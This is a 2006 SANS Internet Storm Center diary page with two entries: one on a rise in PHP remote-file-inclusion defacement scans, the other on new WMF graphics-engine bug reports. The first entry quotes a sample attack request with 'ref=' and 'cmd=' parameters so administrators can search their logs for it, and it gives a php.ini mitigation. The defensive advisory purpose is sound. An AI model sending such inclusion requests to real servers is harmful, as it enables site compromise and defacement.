Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-01-09 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Probable php shell/web defacement tool usage on the rise

Published: 2006-01-09
Last Updated: 2006-01-09 23:00:39 UTC
by William Salusky (Version: 2)
0 comment(s)
The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initally reported site hosting the php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  Clearly the common thread will be 'ref=' and 'cmd=' on the same http log entry.  Looks fairly trivial to create a snort signature to identify this scanning/abuse considering that this is an edge case that bleedingsnort rules does not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

/etc/php.ini
allow_url_fopen = Off

We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically.  As with any complex PHP application, keep them patched.
Keywords:
0 comment(s)

Another WMF attack vector?

Published: 2006-01-09
Last Updated: 2006-01-09 22:02:13 UTC
by William Salusky (Version: 2)
0 comment(s)
We had hoped the chapter on WMF exploits had finally been closed, pending the patching of countless millions of vulnerable workstations of course.  However, today we were forwarded a Bugtraq disclosure of two additional functions vulnerable to memory corruption attack within the Microsoft graphics rendering engine.  The flaw reportedly affects the 'ExtCreateRegion' and 'ExtEscape' functions and while there has been no current proof of concept exploit/DoS code publicly released we will be watching this issue closely.

reference: http://www.securityfocus.com/bid/16167  (Sorry, you have to cut/paste).

So, is there a new WMF remote code execution threat here?
Microsoft representative response:
"The short answer is no. These are not exploitable bugs (DoS only)"

The SANS handlers have been notified that a Microsoft official response to Today's Bugtraw disclosure will be posted shortly at:
http://blogs.technet.com/msrc/

<resume handler musings> However, Infosec history teaches us that where there is DoS(PoC), there very likely is remote code execution.  I myself will wait for smarter folks than myself to prove the statement.
Keywords:
0 comment(s)
Diary Archives